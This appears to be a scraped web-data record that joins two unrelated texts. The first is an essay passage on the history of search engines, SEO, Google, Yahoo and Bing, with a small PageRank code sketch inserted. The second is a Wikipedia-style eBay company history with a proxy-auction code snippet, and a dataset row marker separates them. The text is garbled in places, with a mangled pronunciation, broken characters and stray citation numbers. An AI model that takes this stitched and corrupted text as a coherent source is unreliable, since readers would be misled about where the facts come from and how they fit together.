publishers 51%. Some premium publishers are able to negotiate higher rates custom integration options as well. 
Yahoo Search Marketing is the rebranded name for Overture after Yahoo bought them out. As of September 2006 their platform is generally the exact same as the old Overture platform, with the same flaws - ad CTR not factored into click cost, it's hard to run local ads, and it is just generally clunky. Yahoo launched another ad platform named Gemini in 2014; however, they only gave it a small share of their overall search inventory and have relied heavily on Bing Ads for text ads and Google for Product Listing Ads in their search results. In 2000 Microsoft launched a keyword driven ad program called keywords, but shut it down after 2 months because they feared it would cannibalize their banner ad revenues. Microsoft AdCenter was launched on May 3, 2006. While Microsoft has limited marketshare, they intend to increase their marketshare by baking search into Internet Explorer 7. On the features front, Microsoft added demographic targeting and dayparting features to the pay per click mix. Microsoft's ad algorithm includes both cost per click and ad clickthrough rate. Microsoft also created the XBox game console, and on May 4, 2006 announced they bought a video game ad targeting firm named Massive Inc. Eventually video game ads will be sold from within Microsoft AdCenter. Windows 10 pushes Bing as a default search tool aggressively, which in turn boosts distribution for Bing search and Bing Ads. Search engine optimization is the art and science of publishing information in a format which will make search engines believe that your content satisfies the needs of their users for relevant search queries. SEO, like search, is a field much older than I am. In fact, it was not originally even named search engine optimization, and to this day most people are still uncertain where that phrase came from. Early search engine optimization consisted mostly of using descriptive file names, page titles, and meta descriptions. As search advanced, on-the-page factors grew more important and then people started trying to aim for specific keyword densities. One of the big things that gave Google an advantage over their competitors was the introduction of PageRank, which graded the value of a page based on the number and quality of links pointing at it. Up until the end of 2003 search was exceptionally easy to manipulate. If you wanted to rank for something all you had to do was buy a few powerful links and place the words you wanted to rank for in the link anchor text. On November 15, 2003 Google began to heavily introduce many more semantic elements into its search product. Researchers and SEO's alike have noticed wild changes in search relevancy during that update and many times since then, but many searchers remain clueless about the changes. Search engines would prefer to bias search results toward informational resources to make the commercial ads on the search results appear more appealing. You can see an example of how search can be biased toward commercial or informational resources by playing with Yahoo Mindset. On January 18, 2005, Google, MSN, and Yahoo announced the release of a NoFollow tag which allows blog owners to block comment spam from passing link popularity. People continued to spam blogs and other resources, largely because search engines may still count some nofollow links, and largely because many of the pages they spammed still rank.
Since 2003 Google has come out with many advanced filters and crawling patterns to help make quality editorial links count more and depreciate the value of many overtly obvious paid links or other forms of link manipulation. Older websites may be given more trust in relevancy algorithms than newer websites (just existing for a period of time is a signal of quality). All major search engines use human editors to help review content quality and help improve their relevancy algorithms. Search engines may factor in user acceptance and other usage data to help determine if a site needs to be reviewed for editorial quality and to help determine if linkage data is legitimate. Navigational or branded search queries may be used as a key signal to authenticate if a site's link profile was manufactured or authentic. Sites which people repeatedly seek out by name are sites which generally provide a good user experience. Google has also heavily pushed giving away useful software, tools, and services like free maps, email, a web browser, and a mobile phone OS, which allow them to personalize search results based on the searcher's historical preferences. Google engineer Matt Cutts frequently comments that any paid link should have the nofollow attribute applied to it, although Google hypocritically does not place the nofollow attribute on links they buy. They also have placed their ads on the leading Warez site and continued to serve ads on sites that they banned for spamming. Yahoo Shopping has also been known to be a big link buyer. Much of the current search research is based upon the view that any form of marketing promotion or SEO is spam. If that were true, it wouldn't make sense that Google is teaching SEO courses, which they do. In many verticals search is self reinforcing, as in a winner-take-most battle. Jakob Nielsen's The Power of Defaults notes that the top search result is clicked on as often as 42% of the time. Not only is the distribution and traffic stream highly disproportionate, but many people tend to link to the results that were easy to find, which makes the system even more self reinforcing, as noted in Mike Grehan's Filthy Linking Rich. A key thing to remember if you are trying to catch up with another website is that you have to do better than what was already done, and significantly enough better that it is comment worthy or citation worthy. You have to make people want to switch their world view to seeing you as an authority on your topic. Search engines will follow what people think. Google's corporate history page has a pretty strong background on Google, starting from when Larry met Sergey at Stanford right up to present day. In 1995 Larry Page met Sergey Brin at Stanford. By January of 1996, Larry and Sergey had begun collaboration on a search engine called BackRub, named for its unique ability to analyze the "back links" pointing to a given website. Larry, who had always enjoyed tinkering with machinery and had gained some notoriety for building a working printer out of Lego bricks, took on the task of creating a new kind of server environment that used low-end PCs instead of big expensive machines. Afflicted by the perennial shortage of cash common to graduate students everywhere, the pair took to haunting the department's loading docks in hopes of tracking down newly arrived computers that they could borrow for their network. A year later, their unique approach to link analysis was earning BackRub a growing reputation among those who had seen it.
Buzz about the new search technology began to build as word spread around campus. BackRub ranked pages using citation notation, a concept which is popular in academic circles. If someone cites a source they usually think it is important. On the web, links act as citations. In the PageRank algorithm links count as votes, but some votes count more than others. Your ability to rank and the strength of your ability to vote for others depends upon your authority: how many people link to you and how trustworthy those links are. In 1998, Google was launched. Sergey tried to shop their PageRank technology, but nobody was interested in buying or licensing their search technology at that time. Later that year Andy Bechtolsheim gave them $100,000 in seed funding, and Google received $25 million from Sequoia Capital and Kleiner Perkins Caufield & Byers the following year. In 1999 AOL selected Google as a search partner, and Yahoo followed suit a year later. In 2000 Google also launched their popular Google Toolbar. Google has gained search market share year over year ever since. In 2000 Google relaunched their AdWords program to sell ads on a CPM basis. In 2002 they retooled the service, selling ads in an auction which would factor in bid price and ad clickthrough rate. On May 1, 2002, AOL announced they would use Google to deliver their search related ads, which was a strong turning point in Google's battle against Overture. In 2003 Google also launched their AdSense program, which allowed them to expand their ad network by selling targeted ads on other websites. Google used a two class stock structure, decided not to give earnings guidance, and offered shares of their stock in a Dutch auction. They received virtually limitless negative press for the perceived hubris they expressed in their "AN OWNER'S MANUAL" FOR GOOGLE'S SHAREHOLDERS. After some controversy surrounding an interview in Playboy, Google dropped their IPO offer range to $85 to $95 per share, down from $108 to $135. Google went public at $85 a share on August 19, 2004 and its first trade was at 11:56 am ET at $100.01. In addition to running the world's most popular search service, Google also runs a large number of vertical search services. Google's corporate mission statement is to organize the world's information and make it universally accessible and useful. However, that statement includes many things outside of the traditional mindset of search, and Google maintains that ads are a type of information. In addition to having strong technology and a strong brand, Google also pays for a significant portion of their search market share. On December 20, 2005 Google invested $1 billion in AOL to continue their partnership and buy a 5% stake in AOL. In February 2006 Google agreed to pay Dell up to $1 billion for 3 years of toolbar distribution. On August 7, 2006, Google signed a 3 year deal to provide search on MySpace for $900 million. On October 9, 2006 Google bought YouTube, a leading video site, for $1.65 billion in stock. Google also pays Mozilla and Opera hundreds of millions of dollars to be the default search provider in their browsers, bundles their Google Toolbar with software from Adobe and Sun Microsystems, and pays AdSense ad publishers $1 for Firefox with Google Toolbar installs, or up to $2 for Google Pack installs. Google also builds brand exposure by placing Ads by Google on their AdSense ads and providing Google Checkout to commercial websites. Google Pack is a package of useful software including a Google Toolbar and software from many other companies.
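The links-as-weighted-votes idea behind BackRub and PageRank described earlier in this section can be approximated in a few lines. This is a minimal power iteration sketch over a tiny made-up link graph, assuming the commonly published 0.85 damping factor; it is not Google's production algorithm:

def pagerank(links, damping=0.85, iterations=50):
    # links maps each page to the list of pages it links to;
    # every linked page is assumed to appear as a key in links
    pages = list(links)
    rank = {p: 1.0 / len(pages) for p in pages}
    for _ in range(iterations):
        new_rank = {p: (1.0 - damping) / len(pages) for p in pages}
        for page, outlinks in links.items():
            if outlinks:
                share = rank[page] / len(outlinks)  # a page splits its vote among its outlinks
                for target in outlinks:
                    new_rank[target] += damping * share
            else:
                for target in pages:  # dangling page: spread its vote evenly
                    new_rank[target] += damping * rank[page] / len(pages)
        rank = new_rank
    return rank

# links = {"a": ["b", "c"], "b": ["c"], "c": ["a"]}
# pagerank(links)  # "c" collects the most link votes and ends up with the highest score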
At the same time Google helps ensure its toolbar is considered good and its competitors don't use sleazy distribution techniques by sponsoring StopBadware.org. Google's distribution, vertical search products, and other portal elements give it a key advantage in best understanding our needs and wants by giving it the largest Database of Intentions. They have moved away from a pure algorithmic approach to a hybrid editorial approach. In April of 2007, Google started mixing recent news results in their organic search results. After Google bought YouTube they started mixing videos directly in Google search results. Since the Florida update in 2003 Google has looked much deeper into linguistics and link filtering. Google's search results are generally the hardest search results for the average webmaster to manipulate. Matt Cutts, Google's former lead engineer in charge of search quality, regularly blogged about SEO and search. Google also has an official blog. Matt Cutts went on leave from Google in 2014 and officially resigned from the company at the end of 2016. On November 10, 2004, Google opened up their Google Advertising Professional program. Google also helps webmasters understand how Google is indexing their site via Google Webmaster Central. Google continues to add features and data to their webmaster console for registered webmasters while obfuscating publicly available data. For an informal look at what working at Google looked like from the inside from 1999 to 2005 you might want to try Xooglers, a blog by former Google brand manager Doug Edwards. In October of 2007 Google attempted to manipulate the public perception of people buying and selling links by announcing that they were going to penalize known link sellers, and then manually editing the toolbar PageRank scores of some well known blogs and other large sites. These PageRank edits did not change search engine rankings or traffic flows, as the PageRank update was entirely aesthetic. The net effect of these new algorithms and other forms of obfuscation Google has introduced has been to make it much harder to rank independent websites owned by small companies, while making SEO easier for large companies that have significant usage signals associated with their websites. This has caused many SEO professionals to chase after servicing large corporate clients, as talent tends to follow the money. Yahoo was founded in 1994 by David Filo and Jerry Yang as a directory of websites. For many years they outsourced their search service to other providers, considering it secondary to their directory and other content features, but by the end of 2002 they realized the importance and value of search and started aggressively acquiring search companies. Overture purchased AllTheWeb and AltaVista in 2003. Yahoo purchased Inktomi in December, 2002, and then consumed Overture in July, 2003, and combined the technologies from the various search companies they bought to make a new search engine. Yahoo dumped Google in favor of their own in house technology on February 17, 2004. In addition to building out their core algorithmic search product, Yahoo has largely favored the concept of social search. On March 20, 2005 Yahoo purchased Flickr, a popular photo sharing site. On December 9, 2005, Yahoo purchased Del.icio.us, a social bookmarking site. Yahoo has also made a strong push to promote Yahoo Answers, a popular free community driven question answering service.
Yahoo has a cool Netrospective of their first 10 years, a brief overview of their corporate history here, and Bill Slawski posted a list of many of the companies Yahoo consumed since Overture. On July 2, 2007, Yahoo launched their behaviorally targeted SmartAds product. On July 29, 2009, Yahoo decided to give up on search and signed a 10 year deal to syndicate Bing ads and algorithmic results on their website. Yahoo shut down their directory service in December of 2014. In 2014 Yahoo signed a deal to be the default search provider in Mozilla Firefox inside the United States. They also did a distribution deal with Oracle; however, those revenue gains were short lived and Yahoo kept losing share in online advertising and web search. Over the years Yahoo not only exited the search business, but they also exited most of their other vertical businesses. The role of the general purpose web portal was relegated to irrelevancy through a combination of factors. Verizon announced they were acquiring the Yahoo operating business in July of 2016 for $4.83 billion. In 1998 MSN Search was launched, but Microsoft did not get serious about search until after Google proved the business model. Until Microsoft saw the light they primarily relied on partners like Overture, Looksmart, and Inktomi to power their search service. They launched their technology preview of their search engine around July 1st of 2004. They formally switched from Yahoo organic search results to their own in house technology on January 31st, 2005. MSN announced they dumped Yahoo's search ad program on May 4th, 2006. On September 11, 2006, Microsoft announced they were launching their Live Search product. On June 1, 2009, Microsoft launched Bing, a new search service which changed the search landscape by placing inline search suggestions for related searches directly in the result set; for instance, when you search for credit cards they will suggest related phrases. Microsoft released a Bing SEO guide for Webmasters PDF which claimed that the additional keyword suggestions helped pull down search demand to lower listed results when compared against the old results 6 through 10 when using a single linear search result set. Conversely, the Google format tends to concentrate attention on the top few search listings. After extensive eye tracking Gord Hotchkiss named this pattern Google's Golden Triangle. While Yahoo has lost much of their relevance, Bing has built a formidable Google search competitor. They have narrowed the revenue gap against Google and have built a profitable search business. Bing is strongest in the US market, while having a lower share outside of the US, in part due to Google driving aggressive installs of Google Chrome from Flash security updates and promoting Chrome across Google properties and the AdSense ad network. Google is more dominant in mobile search than they are in desktop search. One would be foolish to think that there is not a better way to index the web, and a new creative idea is probably just under our noses. The fact that Microsoft is making a large investment into developing a new search technology should be some cause for concern for other major search engines. Through this course of history many smaller search engines have come and gone, as the search industry has struggled to find a balance between profitability and relevancy.
Some of the newer search engine concepts are web site clustering, semantics, and having industry specific smaller search engines and portals, but search may get attacked from entirely different angles. On October 5, 2004 Bill Gross (the founder of Overture and pioneer of paid search) relaunched Snap as a search engine with a completely transparent business model (showing search volumes, revenues, and advertisers). Snap has many advanced sorting features but it may be a bit more than what most searchers were looking for. People tend to like search for the perceived simplicity, even if the behind the scenes process is quite complex. Outside of technology there are four other frontiers from which search is being attacked and commoditized. Some early search pioneers have tried to reboot search, but most of these efforts have failed to gain a sustainable marketshare. Cuil was heavily hyped but quickly went bust. Blekko launched with less hype and lasted longer, but ultimately sold to IBM. Gigablast was founded in 2000 by Matt Wells. They are an open source search engine which has quietly existed for nearly 2 decades. Gabriel Weinberg founded DuckDuckGo in 2008. It leverages the core Bing index but differentiates through the search interface and result features. They have done a great job of consistently growing off a small base and are popular with many web developers, in part for their search privacy features and lack of result personalization. Some foreign markets have dominant local search services. Yandex is big in Russia. Baidu leads China. Naver is popular in South Korea. In 2005 the DoJ obtained search data from AOL, MSN, and Yahoo. Google denied the request, and was sued for search data in January of 2006. Google beat the lawsuit and was only required to hand over a small sample of data. In August of 2006 AOL Research released over 3 months worth of personal search data from 650,000 AOL users. A NYT article identified one of the searchers by name. In 2007 the European Union aggressively probed search companies aiming to limit data retention and maintain searcher privacy rights. As more people create content, attention is becoming more scarce. Due to The Tragedy of the Commons many publishing businesses and business models will die. Many traditional publishing companies enjoyed the profits enabled by running what were essentially regionally based monopolies. Search, and other forms of online media, allow for better targeting and less wasteful, more efficient business models. Due to growing irrelevancy, a fear of change, and a fear of disintermediation, many traditional publishing companies have fought search. In an interview by Danny Sullivan, Eric Schmidt stated he thought many of the lawsuits Google faces are business deals done in a court room. In September of 2006 some Belgian newspaper companies won a copyright lawsuit against Google News which makes Belgian judges look like they do not understand how search or the internet work. Some publisher groups are trying to create an arbitrary information access protocol, Agence France Presse (AFP) sued Google to get them to drop their news coverage, and Google paid the AP a licensing fee. In early 2017 the Wall Street Journal opted out of Google's first-click free program. In turn they saw a 44% decline in organic search traffic, but the WSJ saw a fourfold increase in the rate of visitors converting to paying subscribers. In September of 2005 the Authors Guild sued Google. In October of 2005 major book publishing houses also sued Google over Google Print.
Perfect 10, a pornography company, sued Google for including cached copies of stolen content in their image index, and for allowing publishers to collect income on stolen copyright content via Google AdSense. In May of 2000 a French judge required Yahoo to stop providing access to auctions selling Nazi memorabilia. Many requests for information removal are covered on Chilling Effects and by the EFF. Eric Goldman tracks these cases as well. In 1999 Playboy sued Excite and Netscape for selling banner impressions for searches on the term Playboy. Overture sued Google for patent infringement. Just prior to Google's IPO they settled with Yahoo (who by then had bought out Overture) by giving them 2.7 million shares of class A Google stock. Geico took Google to court in the US for trademark violation because Google allowed Geico to be a keyword trigger to target competing ads. Geico lost this case on December 15, 2004. Around the same time Google lost a similar French trademark case filed by Louis Vuitton. Lane's Gifts sued Google for click fraud, but did not have a strong, well put together case. Google's lawyers pushed them into a class wide out of court settlement of up to $90 million in AdWords credits. The March 2006 settlement aimed to absolve Google of any clickfraud related liabilities back through 2002, when Google launched their pay per click model. Ads for shady products and services have also caused problems. In 2004 search engines in the United States stopped running ads for online casinos. In 2009 a US federal government sting operation busted Google for running ads promoting the illegal sale of steroids. The Chinese search engine Baidu faced domestic regulatory scrutiny after public outrage in response to a kid with cancer dying after blaming his death on a bogus medical procedure marketed via Baidu ads. The impact on Baidu ad sales was major, driving a year over year decline in spite of rapid growth in web usage inside China. Baidu was also investigated for running stealth gambling ads at night. In 2016 Google stopped running payday loan ads in the United States. The US government requested that major search companies turn over a significant amount of search related data. Yahoo, MSN, and AOL gave up search data. The Google blog announced that Google fought the subpoena, and a judge stated that Google did not have to turn over search usage data. AOL not only shared information with the government, but AOL Research also accidentally made search records public record. After the AOL data leak fiasco and news of the NSA spying program, most major search engines began encrypting user searches with secured search sessions. DuckDuckGo took things one step further by promising not to track or follow a user, or personalize search results. Google aggressively tracks Android users and was also fined $22.5 million by the FTC for overriding privacy features in Apple's Safari web browser. On June 27, 2017 the European Commission fined Google €2.42 billion for breaching EU antitrust rules. The specific fine was for Google's preferential placement of their shopping search results, and the European Commission is still investigating multiple other issues with Google, including bundling and default Android search placement. Each search company has its own business objectives and technologies to define relevancy. In order to try to lock users in, search engines offer things like free email, news search, blogging platforms, content hosting, office software, calendars, and feature rich toolbars.
In some cases the software or service is not only free, but it is expensive to provide. For example, Google does not profit from Google News, but they had to pay the AP content licensing fees, and hosting Google Video can't be cheap. In an attempt to collect more data, better target ads, and improve conversion rates, Google offers a wide range of free products and services. The end goal of search is to commoditize the value of as many brands and markets as possible to keep adding value to the search box. They want to commoditize the value of creating content and increase the value of spreading ideas, the value of attention, and the importance of conversion. As they make the network more and more efficient they can eat more and more of the profits, which was a large part of the reasoning behind Jakob Nielsen's Search Engines as Leeches on the Web. Because search aims to gain distribution by virtually any means possible, the search engines that can do the best job of branding and get people to believe most in their goals, ideals, and ecosystem win. Search engines are fighting in many ways on this front, but not all of them are even on the web. For example, search engines are trying to attract the smartest minds by sharing research. Google goes so far as offering free pizza, and Google hires people to track webmaster feedback across the web. Matt Cutts frequently blogs about search and SEO because to him it is important for others to see search, SEO, and Google from his perspective. He offers free tips on Google Video in no small part because it was important for Google Video to beat out YouTube in order for Google to become the default video platform on the web. Once it was clear that Google had lost the video battle to YouTube, Google decided to buy them. Beyond just selling their company beliefs and ideology to get people excited about their field, acquire new workers, and get others to act in a way that benefits their business model, search engines also provide APIs to make portions of their system open enough that they can leverage the free work of other smart, creative, and passionate people. Selling search as an ecosystem goes so far that Google puts out endless betas, allowing users to become unpaid testers and advocates of their products. Even if the other search engines matched Google on relevancy, they are still losing the search war due to Google's willingness to take big risks, Google's brand strength, and how much better Google sells search as an ecosystem. Google wants to make content ad supported and freely accessible. On October 9, 2006, Google announced they were acquiring YouTube for $1.65 billion in stock. In March, 2007, Viacom sued Google and YouTube for $1 billion for copyright infringement. In 2007 Microsoft pushed against Google's market position, calling Google a copyright infringer (for scanning books) and doing research stating that many of Google's blogspot hosted blogs are spam. In 2006 and 2007 numerous social bookmarking and decentralized news sites became popular. Del.icio.us, a popular social bookmarking site, was bought out by Yahoo. Digg.com features fresh news and other items of interest on their home page based on user votes. In 1992 TREC was launched to support research within the information retrieval community by providing the infrastructure necessary for large-scale evaluation of text retrieval methodologies. In addition to helping support the evolution of search they also create special tracks for vertical search and popular publishing models. For example, in 2006 they created a blog track. Past TREC publications are posted here.
There are a number of other popular conferences covering information retrieval. Search Science lists a number of conferences on the right side of the Search Science blog. There are also a number of conferences which talk about search primarily from a marketer's perspective, and the three most well known conferences cover search largely from that angle. Many of the following have not been updated in years, or only cover a partial timeline of the search space, but as a collection they helped me out a lot. SearchEngineWatch is amazingly comprehensive if you piece together all of the articles Danny Sullivan has published. Search Engine History is published by Aaron Wall. 2006 - 2017 |
606 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/EBay | eBay Inc. ( i be EE-bay, often stylized as ebay or Ebay) is an American multinational e-commerce company based in San Jose, California, that allows users to buy or view items via retail sales through online marketplaces and websites in 190 markets worldwide. Sales occur either via online auctions or "buy it now" instant sales, and the company charges commissions to sellers upon sales. eBay was founded by Pierre Omidyar in September 1995. It has 132 million yearly active buyers worldwide and handled $73 billion in transactions in 2023, 48% of which was in the United States. In 2023, the company had a take rate (revenue as a percentage of volume) of 13.81%. 1 eBay is used by individuals, companies, as well as governments to purchase and sell almost any legal, non-controversial item. eBay's auctions use a Vickrey auction (sealed-bid) proxy bid system. Buyers and sellers may rate and review each other after each transaction, resulting in a reputation system. The eBay service is accessible via websites and mobile apps. Software developers can create applications that integrate with eBay through the eBay API. Merchants can also earn commissions from affiliate marketing programs by eBay. eBay was founded as AuctionWeb in California on September 4, 1995, by French-born Iranian-American computer programmer Pierre Omidyar as a hobby to make some extra money. 2 One of the first items sold on AuctionWeb was a broken laser pointer for $14.83. Astonished, Omidyar contacted the winning bidder to ask if he understood that the laser pointer was broken; the buyer explained: "I'm a collector of broken laser pointers. 3 In February 1996, Omidyar's internet service provider informed him that he would need to upgrade to a business account due to the high web traffic of his website. The monthly price increase from $30 to $250 prompted Omidyar to start charging eBay users. The website made $1,000 in its first month, which was more than it cost to run, and $2,500 in its second month. 2 Chris Agarpao was eBay's first employee; he processed mailed check payments. 4 Jeffrey Skoll was hired as the first president of the company in early 1996. 4 In November 1996, the company launched online auctions for airline seats, hotel rooms, cruise berths and other travel-related products in partnership with Electronic Travel Auctions. By that time, the company had hosted more than 200,000 auctions since its founding 14 months earlier. 5 The company changed the name of its service from AuctionWeb to eBay in September 1997, after Echo Bay Technology Group, Omidyar's consulting firm. The echobay.com domain name was already registered by Echo Bay Mines, a gold mining company, so Omidyar shortened it to eBay.com. In 1997, the company received $6.7 million in venture capital funding from Benchmark. 6 The frequently repeated story that eBay was founded to help Omidyar's fianc e trade Pez candy dispensers was fabricated in 1997 by public relations manager Mary Lou Song to give the media a human-interest story and to generate publicity with toy collectors. 4 The most purchased and sold items on the website were Beanie Babies, the most difficult toys to find in retail stores, accounting for 10% of all listings in 1997. Ty, the manufacturer, had set up a website whereby people could trade used Beanie Babies. However, it was overwhelmed with unsortable listings. With a user-friendly interface, eBay became popular with collectors. 
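The sealed-bid proxy system mentioned above can be illustrated with a toy second-price calculation; the fixed bid increment, the single-bidder handling, and the sample maximum bids below are assumptions for illustration, not eBay's actual increment tables:

def resolve_proxy_auction(max_bids, increment=0.50):
    # Toy proxy bidding: the highest maximum bid wins, and the winner pays one
    # increment above the runner-up's maximum, capped at the winner's own maximum.
    ranked = sorted(max_bids.items(), key=lambda kv: kv[1], reverse=True)
    winner, winning_max = ranked[0]
    if len(ranked) == 1:
        return winner, winning_max
    runner_up_max = ranked[1][1]
    return winner, round(min(winning_max, runner_up_max + increment), 2)

# resolve_proxy_auction({"alice": 25.00, "bob": 18.50, "carol": 22.00})
# -> ('alice', 22.5)  alice wins but pays just above carol's maximum, not her own 25.00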
7 Meg Whitman was appointed president and CEO in March 1998. At the time, the company had 30 employees, 500,000 users, and revenues of $4.7 million in the United States. 6 In July 1998, eBay acquired Jump, the developer and operator of Up4Sale, an advertising-supported auction website which at the time had 27,000 separate auctions and 50,000 registered members. 8 In September 1998, during the dot-com bubble, eBay became a public company via an initial public offering led by CFO Gary F. Bengier. 9 Upon the initial public offering, which was priced at $18 per share and closed for trading on its first day at $53 per share, both Omidyar and Skoll became billionaires. 10 In the risk factors section of the annual report filed with the U.S. Securities and Exchange Commission in 1998, Omidyar noted eBay's dependence on the continued strength of the Beanie Babies market. 11 In June 2000, eBay acquired Half.com for $312 million in stock. 12 13 In 2000, eBay partnered with Escrow.com to handle escrow for purchases and sales of motor vehicles, later expanded to other transaction types. 14 By year-end, it had 22.5 million registered users and 79.4 million auctions per quarter. 15 In January 2001, eBay acquired a majority stake in Internet Auction Co. Ltd, operator of the largest internet auction website in South Korea. 16 In February 2002, eBay acquired iBazar, a French online auction site founded in 1998, for approximately $112 million in stock. 17 6 eBay entered the Chinese market in 2002 and shut down its Chinese site in 2007 due to competition from local rival Taobao. 18 19 In February 2002, eBay exited Japan due to competition from Yahoo Japan and began operations in Taiwan with the acquisition of NeoCom Technology for $9.5 million. 20 21 In June 2006, eBay turned over its operations in Taiwan to a joint venture partner. 22 eBay acquired PayPal on October 3, 2002 for $1.4 billion. 23 24 25 26 It phased out its Billpoint payment service in January 2003. 27 On May 28, 2003, in the case of eBay Inc. v. MercExchange, L.L.C., which had implications for the treatment of business method patents, a United States district court jury found eBay guilty of willful patent infringement and ordered the company to pay $35 million in damages after MercExchange accused eBay of infringing on three patents, one of which is used in eBay's "Buy It Now" feature. The decision was appealed to the United States Court of Appeals for the Federal Circuit (CAFC). The CAFC affirmed the judgment of willful infringement, and reversed the lower court and granted a permanent injunction. eBay appealed the permanent injunction to the Supreme Court of the United States, which on May 15, 2006 found an injunction is not required nor automatic in this or any patent case where guilt has been established. The case was sent back to the Virginia district court for consideration of the injunction and a trial on another MercExchange patent. 28 In August 2004, eBay acquired 25% of the classified advertising website Craigslist for $32 million. 29 30 Former disgruntled Craigslist executive Phillip Knowlton was the seller. 31 In December 2004, eBay acquired Rent.com for $415 million. 32 In March 2005, eBay launched Kijiji, a classified advertising website, in international markets. 33 It launched in the United States in July 2007. 34 35 36 In May 2005, eBay acquired Gumtree, a classified advertising website in the United Kingdom. 37 In October 2005, eBay Inc. acquired Skype Technologies for $2.6 billion. 
38 39 40 ProStores was an e-commerce website hosting company owned by eBay. Formerly known as Kurant StoreSense, ProStores was acquired by eBay Inc. by the end of 2005 changing the name to ProStores by eBay. 41 ProStores' feature set included simple wizard-driven website, e-commerce capabilities, site design tools and e-business management. Smaller merchants could also manage the entire process of posting and selling products on eBay using the ProStores interface. It also offered inventory management, supplier communication and integration with Quickbooks and Dreamweaver. eBay announced on July 1, 2014 that support for the platform would end February 1, 2015. 42 In February 2006, Intuit launched a web-based version of ItsDeductible, a donation tracking service, using data from eBay to help users assign a market value to the items they donate. 43 In April 2006, eBay launched eBay Express, a site that was designed to work like a standard Internet shopping site, with fixed prices and no bidding involved. The website had 10 million items listed upon its launch. 44 45 46 47 The site was shut down in October 2008. 48 In January 2007, eBay acquired StubHub, an online marketplace for ticket resale, for $310 million. 49 50 51 52 In January 2008, Meg Whitman resigned as president and CEO of eBay to enter politics, and was replaced with John Donahoe. Whitman remained on the board of directors and continued to advise Donahoe through 2008. 53 In April 2008, eBay sued Craigslist, claiming that in January 2008, Craigslist took actions that "unfairly diluted eBay's economic interest by more than 10% , making eBay lose its seat on the board of directors of Craigslist. 54 Craigslist countersued in May 2008 alleging that eBay used its board seat to gain insider information about Craigslist that was used to compete against the company. 55 In September 2010, Delaware Judge William B. Chandler III ruled that the actions of Craigslist were unlawful and that the actions were taken by Craigslist founders Jim Buckmaster and Craig Newmark had "breached their fiduciary duty of loyalty", and restored eBay's stake in the company to 28.4% from a diluted level of 24.85%. 56 However, the judge dismissed eBay's objection to a staggered board provision, citing that Craigslist has the right to protect its own trade secrets. 57 58 56 In May 2008, eBay announced the opening of a building on the company's North Campus in San Jose, California, the first ground-up structure in the city to be built to LEED Gold standards. The building, the first the company had built in its 13 year existence, uses an array of 3,248 solar panels, spanning 60,000 square feet (5,600 m2), and providing 650 kilowatts of power, 15 18% of the company's total energy requirements, reducing carbon dioxide usage by 37 million pounds over 30 years. The building also has energy-efficient lighting and water system and most waste is recycled. 59 In April 2009, eBay agreed to acquire a controlling stake in G-Market, a South Korean online retailer, for $413 million. 60 61 In May 2009, eBay launched the Selling Manager Applications program (SM Apps). The program allows approved developers to integrate their applications directly into the eBay.com interface. 62 In November 2009, eBay sold a 70% stake in Skype to a consortium led by Silver Lake Partners and Marc Andreessen at a $2.75 billion valuation, while retaining a 30% minority ownership interest in Skype, after failing to integrate Skype into the company's online marketplace. 
63 64 65 Microsoft acquired the entire company for $8.5 billion in May 2011. 66 In June 2011, eBay acquired GSI Commerce for $2.4 billion. 67 In June 2013, it was renamed eBay Enterprise. 68 In May 2012, RentPath, then known as Primedia, acquired Rent.com from eBay for approximately $415 million. 69 70 In September 2012, eBay introduced a new logo using a thinner variation of the Univers typeface. It replaced the thicker Univers logo. 71 72 73 In October 2012, eBay launched an international shipping partnership with Pitney Bowes whereby a seller of an item to be shipped internationally can send the item to a Pitney Bowes facility in their home country, which then forwards it to the international buyer, taking care of all international shipping requirements. 74 The company also launched a partnership with FedEx to offer discounted shipping options to sellers. 75 In November 2012, eBay was charged in the High-Tech Employee Antitrust Litigation, accused by the United States Department of Justice of entering into non-solicitation agreements with other technology companies involving highly skilled employees. 76 The litigation was settled in May 2014, with eBay required to end anti-competitive practices. 77 On September 30, 2014, eBay announced it would spin off PayPal into a separate publicly traded company, a demand made nine months prior by activist hedge fund magnate Carl Icahn. 78 79 The spinoff was completed on July 18, 2015. eBay's then chief executive, John Donahoe, stepped down from that role. 80 81 82 In January 2015, eBay acquired Vivanuncios, a classified advertising website in Mexico. 83 In June 2015, eBay sold its stake in Craigslist back to the company, ending the litigation. 84 85 86 87 In August 2015, eBay sold a portion of its stake in Snapdeal. 88 89 In September 2015, Propay and Skrill were eliminated as payment methods on the eBay website, citing low usage. 90 Flipkart and eBay entered into a strategic partnership in July 2017 under which eBay acquired a 5.44% stake in Flipkart in exchange for the contribution of its India business unit valued at $211 million and a $514 million cash investment in Flipkart. Flipkart launched a program to allow its sellers to sell to customers globally in partnership with eBay. eBay reported a gain of $167 million on the sale of its India operations. 91 92 93 94 In May 2018, eBay sold its stake in Flipkart to Walmart and relaunched its operations in India. 95 In August 2017, eBay shut Half.com. 96 In October 2017, eBay released image retrieval capability allowing users to find listings on the site that match an item depicted in a photo, using artificial intelligence and machine learning technologies. 97 98 On January 31, 2018, eBay announced that it would replace PayPal as its primary payments provider with Netherlands-based start-up Adyen, resulting in lower costs and more control of merchants. 99 In May 2018, eBay acquired the Japanese e-commerce platform Qoo10 for $573 million. 100 101 In July 2018, eBay announced support for Apple Pay as well as a partnership with Square for seller financing loans of up to $100,000. 102 103 In September 2018, in response to the YouTube headquarters shooting, eBay announced plans to install a security fence around the perimeter of its San Jose headquarters to protect employees. 104 In March 2019, the company paid its first dividend following investor pressure to improve shareholder return. 105 On July 31, 2019, the company acquired a 5.59% stake in Paytm Mall. 
